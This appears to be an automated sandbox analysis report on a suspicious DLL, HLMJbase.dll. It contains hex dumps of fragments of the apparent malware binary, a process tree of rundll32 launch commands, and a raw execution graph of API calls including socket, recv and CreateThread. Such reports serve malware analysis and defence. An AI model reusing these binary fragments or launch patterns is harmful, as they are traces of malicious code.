                            2024-12-22 08:29:08 UTC16384INData Raw: ff ff ff b6 84 00 00 00 e8 1f 71 ff ff ff b6 88 00 00 00 e8 14 71 ff ff ff b6 8c 00 00 00 e8 09 71 ff ff ff b6 90 00 00 00 e8 fe 70 ff ff ff b6 94 00 00 00 e8 f3 70 ff ff ff b6 98 00 00 00 e8 e8 70 ff ff ff b6 9c 00 00 00 e8 dd 70 ff ff ff b6 a0 00 00 00 e8 d2 70 ff ff ff b6 a4 00 00 00 e8 c7 70 ff ff ff b6 a8 00 00 00 e8 bc 70 ff ff ff b6 bc 00 00 00 e8 b1 70 ff ff ff b6 c0 00 00 00 e8 a6 70 ff ff ff b6 c4 00 00 00 e8 9b 70 ff ff ff b6 c8 00 00 00 e8 90 70 ff ff ff b6 cc 00 00 00 e8 85 70 ff ff 83 c4 40 ff b6 d0 00 00 00 e8 77 70 ff ff ff b6 b8 00 00 00 e8 6c 70 ff ff ff b6 d8 00 00 00 e8 61 70 ff ff ff b6 dc 00 00 00 e8 56 70 ff ff ff b6 e0 00 00 00 e8 4b 70 ff ff ff b6 e4 00 00 00 e8 40 70 ff ff ff b6 e8 00 00 00 e8 35 70 ff ff ff b6 ec 00 00 00 e8 2a
                            Data Ascii: qqqpppppppppppp@wplpapVpKp@p5p*
                            2024-12-22 08:29:08 UTC16384INData Raw: 75 f8 53 ff 75 14 ff 75 10 ff 75 0c 56 e8 9f fb ff ff 83 c4 20 e8 3c 5b ff ff 83 b8 94 00 00 00 00 74 05 e8 59 84 ff ff 5f 5e 5b c9 c3 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 ca 30 ff ff c7 06 88 77 41 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 53 56 57 e8 ff 5a ff ff 83 b8 0c 02 00 00 00 8b 45 18 8b 4d 08 bf 63 73 6d e0 be ff ff ff 1f bb 22 05 93 19 75 20 8b 11 3b d7 74 1a 81 fa 26 00 00 80 74 12 8b 10 23 d6 3b d3 72 0a f6 40 20 01 0f 85 93 00 00 00 f6 41 04 66 74 23 83 78 04 00 0f 84 83 00 00 00 83 7d 1c 00 75 7d 6a ff 50 ff 75 14 ff 75 0c e8 7a f4 ff ff 83 c4 10 eb 6a 83 78 0c 00 75 12 8b 10 23 d6 81 fa 21 05 93 19 72 58 83 78 1c 00 74 52 39 39 75 32 83 79 10 03 72 2c 39 59 14 76 27 8b 51 1c 8b 52 08 85 d2 74 1d 0f b6 75 24 56 ff 75 20 ff 75 1c 50 ff 75 14 ff
                            Data Ascii: uSuuuV <[tY_^[UVu0wA^]USVWZEMcsm"u ;t&t#;r@ Aft#x}u}jPuuzjxu#!rXxtR99u2yr,9Yv'QRtu$Vu uPu
                            2024-12-22 08:29:08 UTC16384INData Raw: 00 00 00 ff ff ff ff b0 40 41 00 00 00 00 00 bb 40 41 00 01 00 00 00 c6 40 41 00 02 00 00 00 d1 40 41 00 03 00 00 00 de 40 41 00 04 00 00 00 ec 40 41 00 05 00 00 00 f9 40 41 00 06 00 00 00 06 41 41 00 07 00 00 00 13 41 41 00 07 00 00 00 1e 41 41 00 09 00 00 00 2c 41 41 00 0a 00 00 00 3a 41 41 00 0b 00 00 00 48 41 41 00 22 05 93 19 0d 00 00 00 e0 7e 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 80 41 41 00 00 00 00 00 8b 41 41 00 22 05 93 19 02 00 00 00 6c 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c0 41 41 00 ff ff ff ff cb 41 41 00 22 05 93 19 02 00 00 00 a0 7f 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff f0 41 41 00
                            Data Ascii: @A@A@A@A@A@A@AAAAAAA,AA:AAHAA"~AAAAA"lAAAAA"AAA
                            2024-12-22 08:29:08 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:
                            2024-12-22 08:29:08 UTC9507INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:



                            Target ID:0
                            Start time:03:28:59
                            Start date:22/12/2024
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\HLMJbase.dll"
                            Imagebase:0xe30000
                            File size:126'464 bytes
                            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:1
                            Start time:03:28:59
                            Start date:22/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:2
                            Start time:03:28:59
                            Start date:22/12/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
                            Imagebase:0x240000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:3
                            Start time:03:28:59
                            Start date:22/12/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement
                            Imagebase:0x260000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:4
                            Start time:03:28:59
                            Start date:22/12/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
                            Imagebase:0x260000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:5
                            Start time:03:29:02
                            Start date:22/12/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablement
                            Imagebase:0x260000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false


                              Execution Graph

                              Execution Coverage:4.4%
                              Dynamic/Decrypted Code Coverage:9.6%
                              Signature Coverage:13.8%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:65
                              execution_graph 107795 42032e0 6 API calls 107796 6cc0ca81 107799 6cc0ca8e 107796->107799 107800 6cc0caa9 107799->107800 107801 6cc0cace 107799->107801 107811 6cc11c98 107800->107811 107924 6cc6099b 107800->107924 107928 6cc62230 26 API calls 107801->107928 107803 6cc0caab 107804 6cc0ca8a 107803->107804 107927 6cbfa65c RtlFreeHeap 107803->107927 107929 6cc11744 107811->107929 107814 6cc11ce5 107932 6cc46a1a 107814->107932 107817 6cc11d13 107936 6cc0c93d 107817->107936 107818 6cc11cff 107935 6cc01091 26 API calls 107818->107935 107821 6cc11d0a 107823 6cc6099b RegCloseKey 107821->107823 107822 6cc11d2e 107826 6cc11d93 107822->107826 107828 6cc0c93d 27 API calls 107822->107828 107824 6cc11dcf 107823->107824 107829 6cc11df1 107824->107829 107950 6cbc5ad0 107824->107950 107949 6cc01091 26 API calls 107826->107949 107836 6cc11d88 107828->107836 107953 6cc12795 26 API calls 107829->107953 107833 6cc11db8 107835 6cc6099b RegCloseKey 107833->107835 107834 6cc11dfa 107954 6cc4d120 26 API calls 107834->107954 107835->107821 107836->107826 107879 6cc12745 107836->107879 107985 6cc608d4 26 API calls 107836->107985 107839 6cc12759 107839->107826 107842 6cc12767 107839->107842 107841 6cc11e0f 107843 6cc11e52 107841->107843 107844 6cc11e18 107841->107844 107845 6cc12775 107842->107845 108004 6cbf5758 RtlFreeHeap 107842->108004 107957 6cbf5758 RtlFreeHeap 107843->107957 107955 6cc127e7 40 API calls 107844->107955 107850 6cc6099b RegCloseKey 107845->107850 107848 6cc11e2f 107851 6cc11e4d 107848->107851 107956 6cc127e7 40 API calls 107848->107956 107852 6cc12786 107850->107852 107958 6cc127e7 40 API calls 107851->107958 107855 6cc6099b RegCloseKey 107852->107855 107855->107829 107856 6cc11e75 107857 6cc11e93 107856->107857 107959 6cc127e7 40 API calls 107856->107959 107960 6cc127e7 40 API calls 107857->107960 107858 6cc12509 107868 6cc12715 107858->107868 107858->107879 107885 6cc609a7 27 API calls 107858->107885 107862 6cc122ab 107862->107858 107986 
6cc60970 26 API calls 107862->107986 107987 6cc608d4 26 API calls 107862->107987 107863 6cc11ead 107869 6cc11ecb 107863->107869 107961 6cc127e7 40 API calls 107863->107961 107867 6cc123f6 memmove 107867->107862 108001 6cc609a7 27 API calls 107868->108001 107872 6cc11f10 107869->107872 107962 6cc127e7 40 API calls 107869->107962 107870 6cc11eee 107963 6cc127e7 40 API calls 107870->107963 107875 6cc11fd7 107872->107875 107878 6cc11f63 107872->107878 107874 6cc12731 108002 6cbf5758 RtlFreeHeap 107874->108002 107877 6cc12024 107875->107877 107967 6cbf5758 RtlFreeHeap 107875->107967 107996 6cbe7564 107877->107996 107964 6cc12795 26 API calls 107878->107964 108003 6cc0ca21 RtlFreeHeap 107879->108003 107884 6cc11f81 107887 6cc11f8a 107884->107887 107968 6cc60b07 107884->107968 107885->107858 107888 6cc12042 107887->107888 107889 6cc11f9f 107887->107889 107971 6cc128d2 27 API calls 107888->107971 107965 6cc12831 27 API calls 107889->107965 107892 6cc11fa8 107893 6cc11fb2 107892->107893 107894 6cc12468 107892->107894 107966 6cbc6540 27 API calls 107893->107966 107988 6cc11b74 28 API calls 107894->107988 107895 6cc12502 107994 6cbf5758 RtlFreeHeap 107895->107994 107899 6cc11fc2 107991 6cc128f9 40 API calls 107899->107991 107900 6cc124a8 107989 6cc128f9 40 API calls 107900->107989 107902 6cc125e6 107995 6cc3f952 RtlFreeHeap 107902->107995 107905 6cc124bc 107990 6cc11b74 28 API calls 107905->107990 107909 6cc1252e 107911 6cc12571 107909->107911 107992 6cc3f993 RtlFreeHeap 107909->107992 107993 6cc551ce RtlFreeHeap 107911->107993 107914 6cc072e6 26 API calls 107921 6cc12056 107914->107921 107915 6cc12552 107915->107911 107916 6cc12559 memset 107915->107916 107916->107911 107921->107895 107921->107909 107921->107914 107972 6cc08418 26 API calls 107921->107972 107973 6cc128d2 27 API calls 107921->107973 107974 6cc465d5 107921->107974 107979 6cc602f3 26 API calls 107921->107979 107980 6cc12831 27 API calls 107921->107980 107981 6cbf7118 28 API calls 107921->107981 107982 6cc11b74 
28 API calls 107921->107982 107983 6cc128f9 40 API calls 107921->107983 107984 6cc551ce RtlFreeHeap 107921->107984 107925 6cc609a6 107924->107925 107926 6cc6099f RegCloseKey 107924->107926 107925->107803 107926->107925 107927->107804 108005 6cc46706 107929->108005 108012 6cc60989 107932->108012 107935->107821 107937 6cc11744 26 API calls 107936->107937 107938 6cc0c95a 107937->107938 108016 6cc5b59e 107938->108016 107940 6cc0c976 107941 6cc0c98c RegQueryValueExW 107940->107941 108021 6cbce4eb 26 API calls 107940->108021 107941->107940 107942 6cc0c9b5 107941->107942 107944 6cc0c9f3 107942->107944 108022 6cbf5758 RtlFreeHeap 107942->108022 107946 6cc46a1a RtlFreeHeap 107944->107946 107947 6cc0ca19 107946->107947 107947->107822 107948 6cc0ca21 RtlFreeHeap 107947->107948 107948->107822 107949->107833 107951 6cbc5ad8 RtlFreeHeap 107950->107951 107952 6cbc5ad5 107950->107952 107951->107829 107952->107951 107953->107834 107954->107841 107955->107848 107956->107851 107957->107851 107958->107856 107959->107857 107960->107863 107961->107869 107962->107870 107963->107872 107964->107884 107965->107892 107966->107899 107967->107877 107969 6cc60b21 107968->107969 107970 6cc60b0d memcmp 107968->107970 107969->107887 107970->107887 107971->107921 107972->107921 107973->107921 107975 6cc467e8 3 API calls 107974->107975 107976 6cc465eb 107975->107976 107977 6cc465f5 107976->107977 108029 6cc61e20 26 API calls 107976->108029 107977->107921 107979->107921 107980->107921 107981->107921 107982->107921 107983->107921 107984->107921 107985->107862 107986->107862 107987->107867 107988->107900 107989->107905 107990->107899 107991->107895 107992->107915 107993->107895 107994->107902 107995->107877 108030 6cbc5a90 107996->108030 107999 6cbe7578 107999->107803 108001->107874 108002->107879 108003->107839 108004->107845 108007 6cc46718 108005->108007 108006 6cc11768 RegOpenKeyExW 108006->107814 108007->108006 108008 6cc465d5 26 API calls 108007->108008 108009 6cc46750 108008->108009 
108009->108006 108011 6cc46609 26 API calls 108009->108011 108011->108009 108013 6cc6098d 108012->108013 108014 6cc11cfb 108012->108014 108015 6cbc5ad0 RtlFreeHeap 108013->108015 108014->107817 108014->107818 108015->108014 108023 6cc467e8 108016->108023 108019 6cc5b5bc 108019->107940 108021->107940 108022->107944 108024 6cc46822 108023->108024 108025 6cc46819 108023->108025 108024->108025 108028 6cbce49a RtlAllocateHeap GetProcessHeap HeapAlloc 108024->108028 108025->108019 108027 6cc61e20 26 API calls 108025->108027 108028->108025 108031 6cbc5a9b 108030->108031 108032 6cbc5aa4 108030->108032 108037 6cc50110 108031->108037 108034 6cc50110 3 API calls 108032->108034 108035 6cbc5aa2 108034->108035 108035->107999 108036 6cc61e40 26 API calls 108035->108036 108038 6cc50127 108037->108038 108039 6cc5011c RtlAllocateHeap 108037->108039 108042 6cc65070 GetProcessHeap HeapAlloc 108038->108042 108039->108035 108041 6cc5012c 108041->108035 108042->108041 108043 6cc584e7 108055 6cc58538 108043->108055 108045 6cc58692 108046 6cc586df 108075 6cc62170 26 API calls 108046->108075 108047 6cc586f1 108076 6cc625b0 26 API calls 108047->108076 108048 6cc58588 recv 108050 6cc585a0 WSAGetLastError 108048->108050 108048->108055 108050->108055 108052 6cc586ae 108053 6cc586ca 108052->108053 108077 6cc625d0 108052->108077 108053->108045 108080 6cc62230 26 API calls 108053->108080 108055->108045 108055->108046 108055->108047 108055->108048 108055->108052 108060 6cbf5588 RtlFreeHeap 108055->108060 108061 6cc57d41 108055->108061 108072 6cc57cef 26 API calls 108055->108072 108073 6cbe7fe5 RtlFreeHeap 108055->108073 108074 6cbf4da7 35 API calls 108055->108074 108060->108055 108081 6cc2675a 108061->108081 108064 6cc57d5b 108064->108055 108065 6cc57d95 108069 6cc57e8f 108065->108069 108095 6cbf58f1 27 API calls 108065->108095 108096 6cc579d5 26 API calls 108069->108096 108071 6cc57dc2 108094 6cc05199 39 API calls 108071->108094 108072->108055 108073->108055 108074->108055 108109 6cc62230 26 API 
calls 108077->108109 108097 6cc5755c 108081->108097 108084 6cc26772 108084->108064 108084->108065 108086 6cc051a8 108084->108086 108087 6cc051b6 108086->108087 108093 6cc63a84 108086->108093 108087->108071 108088 6cc63aa8 108088->108071 108089 6cc63c1c Sleep 108089->108093 108093->108088 108093->108089 108106 6cbf6c37 39 API calls 108093->108106 108107 6cbf61a2 39 API calls 108093->108107 108108 6cc63e6d 39 API calls 108093->108108 108094->108065 108095->108069 108096->108064 108101 6cc57511 108097->108101 108100 6cc579d5 26 API calls 108100->108084 108102 6cc26760 108101->108102 108103 6cc5752d 108101->108103 108102->108084 108102->108100 108103->108102 108105 6cc6577d 26 API calls 108103->108105 108105->108102 108106->108093 108107->108093 108108->108093 108110 42077a2 108111 42077ae __lseeki64 108110->108111 108112 42077b8 HeapSetInformation 108111->108112 108114 42077c3 108111->108114 108112->108114 108156 420811b HeapCreate 108114->108156 108115 4207811 108116 420781c 108115->108116 108164 4207779 66 API calls 3 library calls 108115->108164 108165 4209bea 86 API calls 4 library calls 108116->108165 108119 4207822 108120 4207826 108119->108120 108121 420782e __RTC_Initialize 108119->108121 108166 4207779 66 API calls 3 library calls 108120->108166 108157 420b2f6 73 API calls __calloc_crt 108121->108157 108123 420782d 108123->108121 108125 420783b 108126 4207847 GetCommandLineW 108125->108126 108127 420783f 108125->108127 108158 420b29e 68 API calls __malloc_crt 108126->108158 108167 4208406 66 API calls 3 library calls 108127->108167 108130 4207857 108168 420b1f0 67 API calls 2 library calls 108130->108168 108133 4207861 108134 4207865 108133->108134 108135 420786d 108133->108135 108169 4208406 66 API calls 3 library calls 108134->108169 108159 420afbe 66 API calls 5 library calls 108135->108159 108139 4207872 108140 4207876 108139->108140 108141 420787e 108139->108141 108170 4208406 66 API calls 3 library calls 108140->108170 108160 42081e5 77 API calls 4 
library calls 108141->108160 108144 4207885 108146 4207891 108144->108146 108147 420788a 108144->108147 108161 4206530 6 API calls 108146->108161 108171 4208406 66 API calls 3 library calls 108147->108171 108151 42078ad 108152 42078be 108151->108152 108172 42083bc 66 API calls _doexit 108151->108172 108173 42083e8 66 API calls _doexit 108152->108173 108155 42078c3 __lseeki64 108156->108115 108157->108125 108158->108130 108159->108139 108160->108144 108174 4205e40 108161->108174 108164->108116 108165->108119 108166->108123 108168->108133 108172->108152 108173->108155 108175 4205e53 _memset 108174->108175 108222 4206116 CreateThread WaitForSingleObject CloseHandle Sleep 108174->108222 108241 4205d70 108175->108241 108177 4205e87 108178 4205d70 3 API calls 108177->108178 108179 4205e98 108178->108179 108180 4205d70 3 API calls 108179->108180 108181 4205ea9 108180->108181 108182 4205d70 3 API calls 108181->108182 108183 4205eba 108182->108183 108184 4205d70 3 API calls 108183->108184 108185 4205ece 108184->108185 108186 4205d70 3 API calls 108185->108186 108187 4205edf 108186->108187 108188 4205d70 3 API calls 108187->108188 108189 4205ef0 108188->108189 108190 4205d70 3 API calls 108189->108190 108191 4205f01 108190->108191 108192 4205d70 3 API calls 108191->108192 108193 4205f12 108192->108193 108194 4205d70 3 API calls 108193->108194 108195 4205f23 108194->108195 108196 4205d70 3 API calls 108195->108196 108197 4205f37 108196->108197 108198 4205d70 3 API calls 108197->108198 108199 4205f48 108198->108199 108200 4205d70 3 API calls 108199->108200 108222->108151 108246 4206120 108222->108246 108242 4205d87 lstrlenW 108241->108242 108243 4205d9a lstrlenW lstrlenW 108241->108243 108244 4205d97 _memset 108242->108244 108245 4205db3 108243->108245 108244->108243 108245->108177 108266 4207734 108246->108266 108251 420617b 108253 42070d7 77 API calls 108251->108253 108254 420618d 108253->108254 108256 42061a0 108254->108256 108282 4205a30 CreateEventW 108254->108282 108257 
4207734 67 API calls 108256->108257 108259 4207228 66 API calls __wsetenvp 108256->108259 108261 4206308 CreateEventA 108256->108261 108307 4202d80 ResetEvent InterlockedExchange timeGetTime socket 108256->108307 108258 42062b7 Sleep 108257->108258 108260 4207734 67 API calls 108258->108260 108259->108256 108260->108256 108328 4203140 GetCurrentThreadId 108261->108328 108267 420771e 108266->108267 108344 420af52 108267->108344 108270 42070d7 108271 42070e1 108270->108271 108273 420616d 108271->108273 108278 42070fd std::exception::exception 108271->108278 108362 4207043 108271->108362 108379 4208641 DecodePointer 108271->108379 108273->108251 108343 4202c60 8 API calls __cftog_l 108273->108343 108275 420713b 108381 4206fe4 66 API calls std::exception::operator= 108275->108381 108277 4207145 108382 420790d RaiseException 108277->108382 108278->108275 108380 42075a9 76 API calls __cinit 108278->108380 108281 4207156 108283 4205a93 108282->108283 108284 4205a89 108282->108284 108391 42065d0 HeapCreate 108283->108391 108397 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108284->108397 108288 4205b22 108398 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108288->108398 108289 4205b2c CreateEventW 108291 4205b65 108289->108291 108292 4205b6f CreateEventW 108289->108292 108399 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108291->108399 108294 4205b94 CreateEventW 108292->108294 108295 4205b8a 108292->108295 108297 4205bb9 InitializeCriticalSectionAndSpinCount 108294->108297 108298 4205baf 108294->108298 108400 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108295->108400 108300 4205c87 InitializeCriticalSectionAndSpinCount 108297->108300 108301 4205c7d 108297->108301 108401 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108298->108401 108303 4205ca8 InterlockedExchange timeGetTime CreateEventW CreateEventW 108300->108303 108304 4205c9e 108300->108304 108402 4201280 
DeleteCriticalSection RaiseException __CxxThrowException@8 108301->108402 108306 4205d3b 108303->108306 108403 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108304->108403 108306->108256 108308 4202de8 108307->108308 108309 4202dfc lstrlenW WideCharToMultiByte 108307->108309 108407 42069d5 5 API calls __call_reportfault 108308->108407 108406 42069bf 108309->108406 108312 4202df6 108312->108256 108329 4203158 108328->108329 108331 420316e 108328->108331 108330 4203160 InterlockedExchange 108329->108330 108330->108330 108330->108331 108408 4201100 108331->108408 108333 420318f 108334 4201100 70 API calls 108333->108334 108335 42031b6 108334->108335 108416 4201060 108335->108416 108343->108251 108347 420ad90 108344->108347 108350 420ada2 108347->108350 108348 420ada8 108358 42072cd 66 API calls __getptd_noexit 108348->108358 108349 420add1 108355 420aded wcstoxl 108349->108355 108360 420e884 GetStringTypeW 108349->108360 108350->108348 108350->108349 108352 420adad 108359 42087f3 11 API calls __cftog_l 108352->108359 108357 4206152 Sleep 108355->108357 108361 42072cd 66 API calls __getptd_noexit 108355->108361 108357->108270 108358->108352 108359->108357 108360->108349 108361->108357 108363 42070c0 108362->108363 108364 4207051 108362->108364 108389 4208641 DecodePointer 108363->108389 108367 420705c 108364->108367 108370 420707f RtlAllocateHeap 108364->108370 108373 42070ac 108364->108373 108377 42070aa 108364->108377 108386 4208641 DecodePointer 108364->108386 108366 42070c6 108390 42072cd 66 API calls __getptd_noexit 108366->108390 108367->108364 108383 42085f9 66 API calls 2 library calls 108367->108383 108384 420844a 66 API calls 8 library calls 108367->108384 108385 4208164 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 108367->108385 108370->108364 108371 42070b8 108370->108371 108371->108271 108387 42072cd 66 API calls __getptd_noexit 108373->108387 108388 42072cd 66 API calls __getptd_noexit 108377->108388 108379->108271 
108380->108275 108381->108277 108382->108281 108383->108367 108384->108367 108386->108364 108387->108377 108388->108371 108389->108366 108390->108371 108392 4206601 108391->108392 108393 42065f7 108391->108393 108394 4205b02 InitializeCriticalSectionAndSpinCount 108392->108394 108405 4207009 66 API calls 2 library calls 108392->108405 108404 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108393->108404 108394->108288 108394->108289 108397->108283 108398->108289 108399->108292 108400->108294 108401->108297 108402->108300 108403->108303 108404->108392 108405->108394 108407->108312 108409 4201111 108408->108409 108410 420110b 108408->108410 108435 4206d60 108409->108435 108410->108333 108412 4201134 VirtualAlloc 108413 420116f 108412->108413 108414 4201198 108413->108414 108415 420118a VirtualFree 108413->108415 108414->108333 108415->108414 108417 4201071 108416->108417 108418 4201100 70 API calls 108417->108418 108436 4206d6d 108435->108436 108437 4207e4e __ctrlfp __floor_pentium4 108435->108437 108436->108437 108438 4206d9e 108436->108438 108439 4207ebc __floor_pentium4 108437->108439 108440 4207e99 108437->108440 108445 4207ea9 __ctrlfp 108437->108445 108444 4206de8 108438->108444 108446 4207b72 67 API calls __flsbuf 108438->108446 108439->108445 108448 420bcbc 67 API calls 6 library calls 108439->108448 108447 420bc67 66 API calls 3 library calls 108440->108447 108444->108412 108445->108412 108446->108444 108447->108445 108448->108445 108449 6cc53ceb 108450 6cc53cf5 108449->108450 108451 6cc53cff 108449->108451 108495 6cc62230 26 API calls 108451->108495 108496 6cbc14ce 108584 6cbe6a4f 108496->108584 108498 6cbc151b 108600 6cc55053 108498->108600 108503 6cbe7564 26 API calls 108504 6cbc15af 108503->108504 108505 6cbe7564 26 API calls 108504->108505 108506 6cbc163b 108505->108506 108507 6cc5b59e 26 API calls 108506->108507 108508 6cbc1673 memmove 108507->108508 108609 6cc49260 108508->108609 108513 6cbe7564 26 API calls 108514 6cbc1841 
108513->108514 108616 6cc4ea20 108514->108616 108517 6cc4ea20 26 API calls 108518 6cbc1883 108517->108518 108624 6cbf9d92 108518->108624 108520 6cbc1895 108521 6cbc18a8 108520->108521 108646 6cc49220 27 API calls 108520->108646 108522 6cbe7564 26 API calls 108521->108522 108524 6cbc18b5 108522->108524 108631 6cc4fa90 108524->108631 108665 6cbdd229 108584->108665 108586 6cbe6b65 108591 6cbe6b6f 108586->108591 108597 6cbe6b7a 108586->108597 108691 6cc624e0 26 API calls 108586->108691 108587 6cbe6a67 108587->108586 108589 6cbe6b1a 108587->108589 108592 6cbe6b90 108587->108592 108598 6cbe6c34 108587->108598 108686 6cbdd409 26 API calls 108587->108686 108687 6cbd585e memcmp 108587->108687 108688 6cbe5d4c 26 API calls 108589->108688 108591->108597 108692 6cc621d0 26 API calls 108591->108692 108689 6cbe5ce4 26 API calls 108592->108689 108597->108498 108690 6cbe651a 27 API calls 108598->108690 108601 6cc5505e 108600->108601 108602 6cbc1543 108601->108602 108700 6cc624e0 26 API calls 108601->108700 108604 6cc187b0 108602->108604 108701 6cbde67d 108604->108701 108607 6cbc15a0 108607->108503 108610 6cc49276 108609->108610 108612 6cbc16bc 108609->108612 108611 6cbc5ad0 RtlFreeHeap 108610->108611 108611->108612 108613 6cc4aaa0 108612->108613 108705 6cc47a80 108613->108705 108617 6cc4ea51 108616->108617 108618 6cbc1867 108617->108618 108619 6cc4eabb 108617->108619 108621 6cc4ea9e 108617->108621 108718 6cc4eb30 RtlFreeHeap 108617->108718 108618->108517 108720 6cc64e50 26 API calls 108619->108720 108719 6cc624e0 26 API calls 108621->108719 108625 6cbf9d98 108624->108625 108626 6cbf9da2 108624->108626 108625->108626 108721 6cbf5758 RtlFreeHeap 108625->108721 108626->108520 108628 6cc56a32 108629 6cc56a47 108628->108629 108630 6cbc5ad0 RtlFreeHeap 108628->108630 108629->108520 108630->108629 108632 6cc50110 3 API calls 108631->108632 108633 6cc4fad3 108632->108633 108634 6cc4fb70 108633->108634 108635 6cc4fadb CreateThread 108633->108635 108722 6cc61e40 26 API calls 108634->108722 
108637 6cbc1ae2 108635->108637 108638 6cc4fb0a 108635->108638 108723 6cc4fbe0 SetThreadStackGuarantee 108635->108723 108647 6cc492c0 108637->108647 108640 6cc4fb47 108638->108640 108642 6cbc5ad0 RtlFreeHeap 108638->108642 108643 6cbc5ad0 RtlFreeHeap 108640->108643 108642->108640 108645 6cc4fb54 GetLastError 108643->108645 108645->108637 108646->108521 108648 6cc492e5 108647->108648 108649 6cc492de 108647->108649 109190 6cc48c80 26 API calls 108648->109190 108651 6cc492e3 108649->108651 109191 6cc64b60 26 API calls 108649->109191 108653 6cc625d0 26 API calls 108651->108653 108654 6cbc1b18 108651->108654 108666 6cbdd23f 108665->108666 108669 6cbdd29d 108665->108669 108667 6cbdd275 108666->108667 108668 6cbdd2bb 108666->108668 108693 6cbe48d4 ProcessPrng 108667->108693 108694 6cbdd4a8 26 API calls 108668->108694 108669->108668 108671 6cbdd383 108669->108671 108684 6cbdd27c 108669->108684 108695 6cbe4a5c 26 API calls 108671->108695 108674 6cbdd399 108696 6cbe4a2f 26 API calls 108674->108696 108676 6cbdd3a0 108697 6cbe634c RtlFreeHeap 108676->108697 108678 6cbdd3ae 108679 6cc467e8 3 API calls 108678->108679 108680 6cbdd3c6 108679->108680 108681 6cbdd3fe 